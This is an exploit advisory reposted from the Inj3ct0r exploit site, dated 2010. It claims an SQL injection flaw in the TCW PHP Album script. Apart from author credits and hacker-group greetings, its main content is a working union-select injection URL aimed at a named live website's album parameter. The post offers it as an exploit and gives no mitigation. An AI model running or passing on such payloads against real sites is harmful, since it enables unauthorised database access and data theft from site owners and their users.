TCW PHP Album SQL injection Vulnerabilty
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>TCW PHP Album SQL injection Vulnerabilty</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>========================================
TCW PHP Album SQL injection Vulnerabilty
========================================
Name : TCW PHP Album SQL iNjection Vulnerabilty
Critical Level :VERY HIGH
vendor URL :http://www.codango.com/php/fnc/goto/?id=7951410
Price:free
Author : ..::[ SONiC ]::.. aka ~the_pshyco~ <sonicdefence[at]gmail.com>
special thanks to : Sid3^effects,r0073r (inj3ct0r.com),L0rd CruSad3r,M4n0j,Bunny,Nishi,MA1201,RJ,D3aD F0x
greetz to :www.topsecure.net ,All ICW members , iNj3cT0r.com, www.andhrahackers.com
special Shoutz : my Girl Frnd [H*****]
#######################################################################################################
Description :
TCW PHP Album is a set of PHP scripts that (using MySQL and the GD Library) allow you to easily make online multimedia albums. With an intuitive administrative panel you can quickly add albums, photos, themes, and change site settings.
#######################################################################################################
Xploit :SQl i vulnerabilty
DEMO URL http://www.tcwonline.org/~greentryst/photos/index.php?album=-3%20union%20all%20select%207,6,5,4,3,2,1–
###############################################################################################################
# ..::[ SONiC ]::.. aka the_pshyco
# profile http://inj3ct0r.com/author/2545
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-06]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13175
Leave a Reply